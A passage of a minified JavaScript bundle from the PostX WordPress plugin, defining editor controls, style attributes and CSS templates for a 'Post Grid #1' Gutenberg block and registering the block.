Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,exSettings:["metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category",textScroll:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,incStyle:[{position:0,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}}],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},22850:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},previewImg:{type:"string",default:""},layout:{type:"string",default:"layout1"},headingText:{type:"string",default:"Post Grid #1"},gridStyle:{type:"string",default:"style1"},columns:{type:"object",default:{lg:"3",xs:"1",sm:"2"},style:[{depends:[{key:"gridStyle",condition:"==",value:["style1","style2"]}],selector:"{{ULTP}} .ultp-block-items-wrap { grid-template-columns: repeat({{columns}}, 1fr); }"}]},columnGridGap:{type:"object",default:{lg:"30",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-row { grid-column-gap: {{columnGridGap}}; }"}]},rowSpace:{type:"object",default:{lg:"30"},style:[{depends:[{key:"separatorShow",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-block-row {row-gap: {{rowSpace}}px; }"},{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { padding-bottom: {{rowSpace}}px; margin-bottom:{{rowSpace}}px; }"}]},equalHeight:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} .ultp-block-content-wrap { height: 100%; color: red; } \n        {{ULTP}} .ultp-block-content,\n        {{ULTP}} .ultp-block-content-wrap { display: flex; flex-direction: column; }\n        {{ULTP}} .ultp-block-content { flex-grow: 1; flex: 1; }\n        {{ULTP}} .ultp-block-readmore { margin-top: auto;}"}]},contentTag:{type:"string",default:"div"},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  \n            cursor: pointer; \n            text-decoration: none; \n            display: inline; \n            padding-bottom: 2px; \n            transition: all 0.35s linear !important;\n            background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% ); \n            background-size: 0px 2px; \n            background-repeat: no-repeat; \n            background-position: left 100%; \n          }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  \n            border-bottom:none; \n            padding-bottom: 2px; \n            background-position:0 100%; \n            background-repeat: repeat; \n            background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); \n          }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  \n              text-decoration: none; transition: all 1s cubic-bezier(1,.25,0,.75) 0s; \n              position: relative; \n              transition: all 0.35s ease-out; \n              padding-bottom: 3px; \n              border-bottom:none; \n              padding-bottom: 2px; \n              background-position:0 100%; \n              background-repeat: repeat; \n              background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); \n          }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { \n            cursor: pointer; \n            font-weight: 600; \n            text-decoration: none; \n            display: inline; padding-bottom: 2px; \n            transition: all 0.3s linear !important; \n            background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% ); \n            background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; \n          }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover { \n              text-decoration: none; \n              transition: all 0.35s ease-out; \n              border-bottom:none; \n              padding-bottom: 2px; \n              background-position:0 100%; \n              background-repeat: repeat; \n              background-size:auto; \n              background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); \n            }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { \n            cursor: pointer; \n            text-decoration: none; \n            display: inline; \n            padding-bottom: 2px; \n            transition: all 0.3s linear !important; \n            background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  \n            background-size: 100% 2px; \n            background-repeat: no-repeat; background-position: left 100%; \n          }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a { \n            background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); \n            background-repeat: no-repeat; \n            background-size: 100% 2px; background-position: 0 88%; \n            transition: background-size 0.15s ease-in; padding: 5px 5px; \n          }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { \n            cursor: pointer; \n            text-decoration: none; \n            display: inline; \n            padding-bottom: 2px; \n            transition: all 0.3s linear !important; \n            background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  \n            background-size: 0px 2px; \n            background-repeat: no-repeat; \n            background-position: right 100%; \n          }"},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a {\n            cursor: pointer; \n            text-decoration: none; \n            display: inline; \n            padding-bottom: 2px; \n            transition: all 0.3s linear !important; \n            background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  \n            background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; \n          }"},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a {\n            background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); \n            background-repeat: no-repeat; \n            background-size: 100% 10px; \n            background-position: 0 88%; \n            transition: 0.3s ease-in; padding: 3px 5px; \n          } "}]},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!0},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"22",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"26",unit:"px"},transform:"",decoration:"none",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title, \n          {{ULTP}} div.ultp-block-wrapper .ultp-block-items-wrap .ultp-block-item .ultp-block-content .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_landscape",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"gridStyle",condition:"!=",value:"style1"}]}]},imgWidth:{type:"object",default:{lg:"",ulg:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { max-width: {{imgWidth}}; width: 100%; }\n\t\t\t\t\t{{ULTP}} .ultp-block-item .ultp-block-image img { width: 100% }\n\t\t\t\t\t{{ULTP}} .ultp-block-item .ultp-block-video-content video,\n\t\t\t\t\t{{ULTP}} .ultp-block-item .ultp-block-video-content iframe { max-width: {{imgWidth}}; width: 100% !important; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-block-image img, \n          {{ULTP}} .ultp-block-item .ultp-block-video-content video,\n          {{ULTP}} .ultp-block-item .ultp-block-video-content iframe { height: {{imgHeight}} !important; }"}]},imageScale:{type:"string",default:"cover",style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-block-image img {object-fit: {{imageScale}};}"}]},imgAnimation:{type:"string",default:"opacity"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},imgSpacing:{type:"object",default:{lg:"10"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { margin-bottom: {{imgSpacing}}px !important; }"}]},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:10,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:26,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:10,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt{ padding: {{excerptPadding}}; }"}]},contentWidth:{type:"object",default:{lg:"85"},style:[{depends:[{key:"layout",condition:"!=",value:["layout1","layout2"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap .ultp-block-content, \n        {{ULTP}} .ultp-layout4 .ultp-block-content-wrap .ultp-block-content, \n        {{ULTP}} .ultp-layout5 .ultp-block-content-wrap .ultp-block-content { max-width:{{contentWidth}}% !important;  }"}]},contentShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"!=",value:["layout1","layout2"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap, \n        {{ULTP}} .ultp-layout4 .ultp-block-content-wrap, \n        {{ULTP}} .ultp-layout5 .ultp-block-content-wrap { overflow: visible;  } \n        {{ULTP}} .ultp-layout3 .ultp-block-content-wrap .ultp-block-content, \n        {{ULTP}} .ultp-layout4  .ultp-block-content-wrap .ultp-block-content, \n        {{ULTP}} .ultp-layout5 .ultp-block-content-wrap .ultp-block-content"}]},contentRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"!=",value:["layout1","layout2"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap .ultp-block-content, \n        {{ULTP}} .ultp-layout4 .ultp-block-content-wrap .ultp-block-content, \n        {{ULTP}} .ultp-layout5 .ultp-block-content-wrap .ultp-block-content { border-radius:{{contentRadius}}; }"}]},contentAlign:{type:"string",default:"center",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-start;} \n          {{ULTP}} .ultp-block-image img, \n          {{ULTP}} .ultp-block-image { margin-right: auto; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: center;} \n          {{ULTP}} .ultp-block-image img, \n          {{ULTP}} .ultp-block-image { margin: 0 auto; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-end;} \n          .rtl {{ULTP}} .ultp-block-meta {justify-content: start;} \n          {{ULTP}} .ultp-block-image img, \n          {{ULTP}} .ultp-block-image { margin-left: auto; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:".rtl {{ULTP}} .ultp-block-readmore a { display:flex; flex-direction:row-reverse;justify-content: flex-end; }"}]},contentWrapBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-content-wrap { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},innerBgColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"layout",condition:"!=",value:"layout1"},{key:"layout",condition:"!=",value:"layout2"}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap .ultp-block-content,\n          {{ULTP}} .ultp-layout4 .ultp-block-content-wrap .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content-wrap .ultp-block-content { background:{{innerBgColor}}; }"}]},contentWrapInnerPadding:{type:"object",default:{lg:{unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content, \n          {{ULTP}} .ultp-layout2 .ultp-block-content, \n          {{ULTP}} .ultp-layout3 .ultp-block-content { padding: {{contentWrapInnerPadding}}; }"}]},contentWrapPadding:{type:"object",default:{lg:{unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { padding: {{contentWrapPadding}}; }"}]},separatorShow:{type:"boolean",default:!0},septColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { border-bottom-color:{{septColor}}; }"}]},septStyle:{type:"string",default:"dashed",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { border-bottom-style:{{septStyle}}; }"}]},septSize:{type:"string",default:{lg:"1"},style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { border-bottom-width: {{septSize}}px; }"}]},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { \n              position: relative; display: block; margin: auto 0 0 0; height: auto;\n          }"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; } \n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:"0"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"pagination"},enhancedPaginationEnabled:{type:"boolean",default:!0},...(0,o.t)(["advFilter","heading","advanceAttr","pagination","video","meta","category","readMore","query"],[],[{key:"vidIconPosition",default:"center"},{key:"iconSize",default:{lg:"80",sm:"50",xs:"50",unit:"px"}},{key:"catLineColor",default:"var(--postx_preset_Primary_color)"},{key:"catLineHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catTypo",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""}},{key:"catColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"catBgColor",default:{openColor:1,type:"color",color:"var(--postx_preset_Primary_color)"}},{key:"catHoverColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"catBgHoverColor",default:{openColor:1,type:"color",color:"var(--postx_preset_Secondary_color)"}},{key:"catSacing",default:{lg:{top:10,bottom:5,unit:"px"},unit:"px"}},{key:"readMoreColor",default:"var(--postx_preset_Primary_color)"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"}},{key:"readMoreHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"readMoreBgHoverColor",default:{openColor:0,type:"color",color:""}},{key:"readMorePadding",default:{lg:{top:"2",bottom:"2",left:"10",right:"8",unit:"px"}}}]),...(0,i.b)({}),V4_1_0_CompCheck:a.O}},5715:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(13452),r=l(22850),s=l(41850);const{__}=wp.i18n,{registerBlockType:p,createBlock:c}=wp.blocks,u=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-grid-1/","block_docs");p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-grid-1.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Post Grid in the classic style.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:u},__("Documentation","ultimate-post"))),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postgrid1.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-grid-1")]},edit:n.Z,save:()=>null})},67163:(e,t,l)=>{"use strict";l.d(t,{Z:()=>M});var 